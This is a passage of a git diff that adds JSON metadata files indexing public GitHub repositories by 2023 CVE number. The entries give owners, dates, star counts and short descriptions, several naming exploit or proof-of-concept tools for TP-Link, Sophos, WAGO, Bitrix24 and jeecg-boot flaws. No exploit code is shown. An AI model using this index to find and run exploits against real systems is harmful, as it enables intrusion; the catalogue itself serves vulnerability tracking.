"https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4", + "html_url": "https:\/\/github.com\/cve-2024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2024\/CVE-2023-1326-PoC", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:15:50Z", + "updated_at": "2024-06-14T07:18:15Z", + "pushed_at": "2024-06-14T07:18:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1337.json b/2023/CVE-2023-1337.json new file mode 100644 index 0000000000..d6c74ea3c4 --- /dev/null +++ b/2023/CVE-2023-1337.json @@ -0,0 +1,33 @@ +[ + { + "id": 616393433, + "name": "CVE-2023-1337", + "full_name": "Penkyzduyi\/CVE-2023-1337", + "owner": { + "login": "Penkyzduyi", + "id": 69184246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69184246?v=4", + "html_url": "https:\/\/github.com\/Penkyzduyi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Penkyzduyi\/CVE-2023-1337", + "description": "Puni love is", + "fork": false, + "created_at": "2023-03-20T09:57:53Z", + "updated_at": "2023-03-20T09:57:53Z", + "pushed_at": "2023-03-20T09:57:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1389.json b/2023/CVE-2023-1389.json new file mode 100644 index 0000000000..31dc571e8a --- /dev/null +++ b/2023/CVE-2023-1389.json @@ -0,0 +1,64 @@ +[ + { + "id": 671741059, + "name": "CVE-2023-1389", + "full_name": "Voyag3r-Security\/CVE-2023-1389", + "owner": { + "login": "Voyag3r-Security", + "id": 140756583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140756583?v=4", + "html_url": "https:\/\/github.com\/Voyag3r-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Voyag3r-Security\/CVE-2023-1389", + "description": null, + "fork": false, + "created_at": "2023-07-28T03:09:00Z", + "updated_at": "2024-12-24T01:30:26Z", + "pushed_at": "2024-07-18T20:07:11Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689374873, + "name": "CVE-2023-1389", + "full_name": "Terminal1337\/CVE-2023-1389", + "owner": { + "login": "Terminal1337", + "id": 95563109, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95563109?v=4", + "html_url": "https:\/\/github.com\/Terminal1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Terminal1337\/CVE-2023-1389", + "description": "TP-Link Archer AX21 - Unauthenticated Command Injection [Loader]", + "fork": false, + "created_at": "2023-09-09T15:53:22Z", + "updated_at": "2024-06-09T09:56:08Z", + "pushed_at": "2023-09-09T15:58:39Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1415.json b/2023/CVE-2023-1415.json new file mode 100644 index 0000000000..a87ebee13e --- /dev/null +++ b/2023/CVE-2023-1415.json @@ -0,0 +1,33 @@ +[ + { + "id": 614268694, + "name": "CVE-2023-1415", + "full_name": "0xxtoby\/CVE-2023-1415", + "owner": { + "login": "0xxtoby", + "id": 64345433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64345433?v=4", + "html_url": "https:\/\/github.com\/0xxtoby", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xxtoby\/CVE-2023-1415", + "description": null, + "fork": false, + "created_at": "2023-03-15T08:44:59Z", + "updated_at": "2023-03-17T04:50:55Z", + "pushed_at": "2023-03-15T08:48:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1430.json b/2023/CVE-2023-1430.json new file mode 100644 index 0000000000..25e7ff4c35 --- /dev/null +++ b/2023/CVE-2023-1430.json @@ -0,0 +1,33 @@ +[ + { + "id": 652556352, + "name": "CVE-2023-1430", + "full_name": "karlemilnikka\/CVE-2023-1430", + "owner": { + "login": "karlemilnikka", + "id": 20514810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4", + "html_url": "https:\/\/github.com\/karlemilnikka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2023-1430", + "description": "Responsible disclosure of unpatched vulnerability in FluentCRM by WPManageNinja", + "fork": false, + "created_at": "2023-06-12T10:07:01Z", + "updated_at": "2023-06-12T10:40:10Z", + "pushed_at": "2024-01-27T21:15:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1454.json b/2023/CVE-2023-1454.json new file mode 100644 index 0000000000..77af6edba5 --- /dev/null +++ b/2023/CVE-2023-1454.json @@ -0,0 +1,219 @@ +[ + { + "id": 618236086, + "name": "CVE-2023-1454", + "full_name": "gobysec\/CVE-2023-1454", + "owner": { + "login": "gobysec", + "id": 50955360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50955360?v=4", + "html_url": "https:\/\/github.com\/gobysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gobysec\/CVE-2023-1454", + "description": "jeecg-boot unauthorized SQL Injection Vulnerability (CVE-2023-1454)", + "fork": false, + "created_at": "2023-03-24T03:02:33Z", + "updated_at": "2023-10-27T09:44:01Z", + "pushed_at": "2023-04-03T01:36:03Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 626193940, + "name": "CVE-2023-1454", + "full_name": "cjybao\/CVE-2023-1454", + "owner": { + "login": "cjybao", + "id": 61445855, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61445855?v=4", + "html_url": "https:\/\/github.com\/cjybao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cjybao\/CVE-2023-1454", + "description": "jmreport\/qurestSql 未授权SQL注入批量扫描poc", + "fork": false, + "created_at": "2023-04-11T01:41:16Z", + "updated_at": "2023-07-25T07:41:14Z", + "pushed_at": "2023-04-07T03:41:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 627250763, + "name": "CVE-2023-1454-EXP", + "full_name": "3yujw7njai\/CVE-2023-1454-EXP", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-1454-EXP", + "description": "CVE-2023-1454 jeecg-boot Unauthorized SQL injection vulnerability", + "fork": false, + "created_at": "2023-04-13T04:51:41Z", + "updated_at": "2024-06-26T04:41:26Z", + "pushed_at": "2023-04-13T04:53:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627599065, + "name": "CVE-2023-1454", + "full_name": "BugFor-Pings\/CVE-2023-1454", + "owner": { + "login": "BugFor-Pings", + "id": 96440773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96440773?v=4", + "html_url": "https:\/\/github.com\/BugFor-Pings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BugFor-Pings\/CVE-2023-1454", + "description": "CVE-2023-1454漏洞检测脚本", + "fork": false, + "created_at": "2023-04-13T19:56:47Z", + "updated_at": "2023-04-13T20:33:08Z", + "pushed_at": "2023-04-13T20:33:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 630844635, + "name": "CVE-2023-1454", + "full_name": "padbergpete47\/CVE-2023-1454", + "owner": { + "login": "padbergpete47", + "id": 61945676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61945676?v=4", + "html_url": "https:\/\/github.com\/padbergpete47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/padbergpete47\/CVE-2023-1454", + "description": "CVE-2023-1454,Jeecg-Boot 前台SQL注入,CVE-2023-1454批量检测", + "fork": false, + "created_at": "2023-04-21T09:27:45Z", + "updated_at": "2024-07-15T09:29:53Z", + "pushed_at": "2023-04-21T09:39:29Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656080043, + "name": "CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln", + "full_name": "Sweelg\/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln", + "owner": { + "login": "Sweelg", + "id": 86879265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86879265?v=4", + "html_url": "https:\/\/github.com\/Sweelg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sweelg\/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln", + "description": "jmreport\/qurestSql 未授权SQL注入批量扫描poc Jeecg-Boot是一款基于Spring Boot和Jeecg-Boot-Plus的快速开发平台,最新的jeecg-boot 3.5.0 中被爆出多个SQL注入漏洞。", + "fork": false, + "created_at": "2023-06-20T08:12:49Z", + "updated_at": "2024-09-13T07:08:03Z", + "pushed_at": "2023-06-20T08:51:47Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737472483, + "name": "CVE-2023-1454-EXP", + "full_name": "shad0w0sec\/CVE-2023-1454-EXP", + "owner": { + "login": "shad0w0sec", + "id": 73059812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73059812?v=4", + "html_url": "https:\/\/github.com\/shad0w0sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shad0w0sec\/CVE-2023-1454-EXP", + "description": "JeecgBoot SQL(CVE-2023-1454)sqlmap 注入不出来的情况可以使用该脚本", + "fork": false, + "created_at": "2023-12-31T06:47:01Z", + "updated_at": "2024-09-08T04:48:34Z", + "pushed_at": "2024-01-10T08:09:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1488.json b/2023/CVE-2023-1488.json new file mode 100644 index 0000000000..d46a2d430c --- /dev/null +++ b/2023/CVE-2023-1488.json @@ -0,0 +1,33 @@ +[ + { + "id": 872735551, + "name": "CVE-2023-1488", + "full_name": "involuntairly\/CVE-2023-1488", + "owner": { + "login": "involuntairly", + "id": 132420742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132420742?v=4", + "html_url": "https:\/\/github.com\/involuntairly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/involuntairly\/CVE-2023-1488", + "description": "CVE + VDM Controls", + "fork": false, + "created_at": "2024-10-15T01:32:39Z", + "updated_at": "2024-10-18T20:50:15Z", + "pushed_at": "2024-10-18T20:50:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1498.json b/2023/CVE-2023-1498.json new file mode 100644 index 0000000000..1b9919f6ea --- /dev/null +++ b/2023/CVE-2023-1498.json @@ -0,0 +1,33 @@ +[ + { + "id": 615981091, + "name": "BugHub", + "full_name": "Decemberus\/BugHub", + "owner": { + "login": "Decemberus", + "id": 104720270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104720270?v=4", + "html_url": "https:\/\/github.com\/Decemberus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Decemberus\/BugHub", + "description": "CVEHub of CVE-2023-1498 and CVE-2023-1500", + "fork": false, + "created_at": "2023-03-19T09:06:59Z", + "updated_at": "2024-03-09T04:46:13Z", + "pushed_at": "2024-03-09T04:45:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1665.json b/2023/CVE-2023-1665.json new file mode 100644 index 0000000000..de1ad38655 --- /dev/null +++ b/2023/CVE-2023-1665.json @@ -0,0 +1,33 @@ +[ + { + "id": 620322465, + "name": "CVE-2023-1665", + "full_name": "0xsu3ks\/CVE-2023-1665", + "owner": { + "login": "0xsu3ks", + "id": 97468816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97468816?v=4", + "html_url": "https:\/\/github.com\/0xsu3ks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xsu3ks\/CVE-2023-1665", + "description": "CVE-2023-1665 - Twake App", + "fork": false, + "created_at": "2023-03-28T13:07:34Z", + "updated_at": "2023-05-04T13:54:34Z", + "pushed_at": "2023-03-28T13:14:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1671.json b/2023/CVE-2023-1671.json new file mode 100644 index 0000000000..fc11325bc5 --- /dev/null +++ b/2023/CVE-2023-1671.json @@ -0,0 +1,97 @@ +[ + { + "id": 631439804, + "name": "CVE-2023-1671", + "full_name": "ohnonoyesyes\/CVE-2023-1671", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2023-1671", + "description": "Pre-Auth RCE in Sophos Web Appliance", + "fork": false, + "created_at": "2023-04-23T02:58:17Z", + "updated_at": "2024-03-27T16:23:35Z", + "pushed_at": "2023-04-23T02:59:38Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 632051037, + "name": "CVE-2023-1671-POC", + "full_name": "W01fh4cker\/CVE-2023-1671-POC", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-1671-POC", + "description": "CVE-2023-1671-POC, based on dnslog platform", + "fork": false, + "created_at": "2023-04-24T15:53:42Z", + "updated_at": "2024-08-12T20:31:01Z", + "pushed_at": "2023-04-26T02:40:41Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-1671" + ], + "visibility": "public", + "forks": 3, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 641885483, + "name": "cve-2023-1671", + "full_name": "csffs\/cve-2023-1671", + "owner": { + "login": "csffs", + "id": 108768133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108768133?v=4", + "html_url": "https:\/\/github.com\/csffs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/csffs\/cve-2023-1671", + "description": "Exploit to cve-2023-1671. So there is a test and exploitation function. The test sends a ping request to the dnslog domain from the vulnerable site. If the ping passes, the vulnerability exists, if it doesn't, then cve-2023-1671 is missing. The exploit function, on the other hand, sends a request with your command to the server.", + "fork": false, + "created_at": "2023-05-17T11:20:27Z", + "updated_at": "2023-05-17T12:03:48Z", + "pushed_at": "2023-05-17T12:03:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1698.json b/2023/CVE-2023-1698.json new file mode 100644 index 0000000000..1f71d06e47 --- /dev/null +++ b/2023/CVE-2023-1698.json @@ -0,0 +1,95 @@ +[ + { + "id": 692207494, + "name": "CVE-2023-1698", + "full_name": "Chocapikk\/CVE-2023-1698", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-1698", + "description": "WAGO Remote Exploit Tool for CVE-2023-1698", + "fork": false, + "created_at": "2023-09-15T20:06:31Z", + "updated_at": "2024-10-01T09:09:48Z", + "pushed_at": "2023-09-15T20:07:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 707534264, + "name": "CVE-2023-1698", + "full_name": "deIndra\/CVE-2023-1698", + "owner": { + "login": "deIndra", + "id": 73511417, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73511417?v=4", + "html_url": "https:\/\/github.com\/deIndra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/deIndra\/CVE-2023-1698", + "description": null, + "fork": false, + "created_at": "2023-10-20T05:40:32Z", + "updated_at": "2023-10-20T05:44:30Z", + "pushed_at": "2023-10-20T05:44:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707675736, + "name": "WAGO-CVE-2023-1698", + "full_name": "thedarknessdied\/WAGO-CVE-2023-1698", + "owner": { + "login": "thedarknessdied", + "id": 56123966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56123966?v=4", + "html_url": "https:\/\/github.com\/thedarknessdied", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thedarknessdied\/WAGO-CVE-2023-1698", + "description": "WAGO系统远程代码执行漏洞(CVE-2023-1698)", + "fork": false, + "created_at": "2023-10-20T12:15:39Z", + "updated_at": "2023-11-17T06:55:48Z", + "pushed_at": "2023-10-20T12:55:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1718.json b/2023/CVE-2023-1718.json new file mode 100644 index 0000000000..cd32e7310a --- /dev/null +++ b/2023/CVE-2023-1718.json @@ -0,0 +1,33 @@ +[ + { + "id": 715967658, + "name": "Bitrix24DoS", + "full_name": "jhonnybonny\/Bitrix24DoS", + "owner": { + "login": "jhonnybonny", + "id": 87495218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87495218?v=4", + "html_url": "https:\/\/github.com\/jhonnybonny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jhonnybonny\/Bitrix24DoS", + "description": "This Python script is designed to exploit a security vulnerability in Bitrix24, leading to a Denial of Service (DoS) attack. The vulnerability, identified as CVE-2023-1718, allows an attacker to disrupt the normal operation of a Bitrix24 instance.", + "fork": false, + "created_at": "2023-11-08T07:45:54Z", + "updated_at": "2024-03-25T03:34:53Z", + "pushed_at": "2023-11-08T07:51:53Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1767.json b/2023/CVE-2023-1767.json new file mode 100644 index 0000000000..1bcd5ad3bb --- /dev/null +++ b/2023/CVE-2023-1767.json @@ -0,0 +1,33 @@ +[ + { + "id": 614351510, + "name": "CVE-2023-1767", + "full_name": "weizman\/CVE-2023-1767", + "owner": { + "login": "weizman", + "id": 13243797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13243797?v=4", + "html_url": "https:\/\/github.com\/weizman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/weizman\/CVE-2023-1767", + "description": null, + "fork": false, + "created_at": "2023-03-15T12:16:20Z", + "updated_at": "2024-02-20T15:36:28Z", + "pushed_at": "2023-04-20T08:52:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1773.json b/2023/CVE-2023-1773.json new file mode 100644 index 0000000000..29d453f66f --- /dev/null +++ b/2023/CVE-2023-1773.json @@ -0,0 +1,33 @@ +[ + { + "id": 832270686, + "name": "xinhu-v2.3.2", + "full_name": "CTF-Archives\/xinhu-v2.3.2", + "owner": { + "login": "CTF-Archives", + "id": 124352319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124352319?v=4", + "html_url": "https:\/\/github.com\/CTF-Archives", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CTF-Archives\/xinhu-v2.3.2", + "description": "信呼 v2.3.2 针对CVE-2023-1773的研究环境", + "fork": false, + "created_at": "2024-07-22T17:07:33Z", + "updated_at": "2024-07-25T05:06:36Z", + "pushed_at": "2024-07-24T07:57:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1829.json b/2023/CVE-2023-1829.json new file mode 100644 index 0000000000..f26ca04f5f --- /dev/null +++ b/2023/CVE-2023-1829.json @@ -0,0 +1,33 @@ +[ + { + "id": 653926630, + "name": "CVE-2023-1829", + "full_name": "lanleft\/CVE-2023-1829", + "owner": { + "login": "lanleft", + "id": 50655448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50655448?v=4", + "html_url": "https:\/\/github.com\/lanleft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lanleft\/CVE-2023-1829", + "description": null, + "fork": false, + "created_at": "2023-06-15T03:27:03Z", + "updated_at": "2024-11-15T16:28:48Z", + "pushed_at": "2024-02-28T03:23:27Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 73, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1874.json b/2023/CVE-2023-1874.json new file mode 100644 index 0000000000..676703050d --- /dev/null +++ b/2023/CVE-2023-1874.json @@ -0,0 +1,39 @@ +[ + { + "id": 867857150, + "name": "cve-2023-1874", + "full_name": "thomas-osgood\/cve-2023-1874", + "owner": { + "login": "thomas-osgood", + "id": 20747585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20747585?v=4", + "html_url": "https:\/\/github.com\/thomas-osgood", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thomas-osgood\/cve-2023-1874", + "description": null, + "fork": false, + "created_at": "2024-10-04T21:34:02Z", + "updated_at": "2024-11-19T00:00:59Z", + "pushed_at": "2024-10-04T21:34:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-1874", + "cybersecurity", + "exploit", + "python3", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1999.json b/2023/CVE-2023-1999.json new file mode 100644 index 0000000000..52f1b4719e --- /dev/null +++ b/2023/CVE-2023-1999.json @@ -0,0 +1,33 @@ +[ + { + "id": 887214831, + "name": "webp_Android10_r33_CVE-2023-1999", + "full_name": "Pazhanivelmani\/webp_Android10_r33_CVE-2023-1999", + "owner": { + "login": "Pazhanivelmani", + "id": 178174306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178174306?v=4", + "html_url": "https:\/\/github.com\/Pazhanivelmani", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pazhanivelmani\/webp_Android10_r33_CVE-2023-1999", + "description": null, + "fork": false, + "created_at": "2024-11-12T11:12:23Z", + "updated_at": "2024-11-12T11:13:54Z", + "pushed_at": "2024-11-12T11:13:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2002.json b/2023/CVE-2023-2002.json new file mode 100644 index 0000000000..8f2d18f021 --- /dev/null +++ b/2023/CVE-2023-2002.json @@ -0,0 +1,33 @@ +[ + { + "id": 628552597, + "name": "CVE-2023-2002", + "full_name": "lrh2000\/CVE-2023-2002", + "owner": { + "login": "lrh2000", + "id": 41988959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41988959?v=4", + "html_url": "https:\/\/github.com\/lrh2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lrh2000\/CVE-2023-2002", + "description": "Linux Bluetooth - Run arbitrary management commands as an unprivileged user", + "fork": false, + "created_at": "2023-04-16T10:05:13Z", + "updated_at": "2024-10-10T03:01:06Z", + "pushed_at": "2023-05-31T16:06:34Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 83, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20025.json b/2023/CVE-2023-20025.json new file mode 100644 index 0000000000..41b1533d03 --- /dev/null +++ b/2023/CVE-2023-20025.json @@ -0,0 +1,33 @@ +[ + { + "id": 634532370, + "name": "CVE-2023-20025", + "full_name": "lnversed\/CVE-2023-20025", + "owner": { + "login": "lnversed", + "id": 46649884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46649884?v=4", + "html_url": "https:\/\/github.com\/lnversed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnversed\/CVE-2023-20025", + "description": "Cisco r042 research", + "fork": false, + "created_at": "2023-04-30T12:46:16Z", + "updated_at": "2023-09-05T12:15:14Z", + "pushed_at": "2023-04-30T12:48:53Z", + "stargazers_count": 0, + 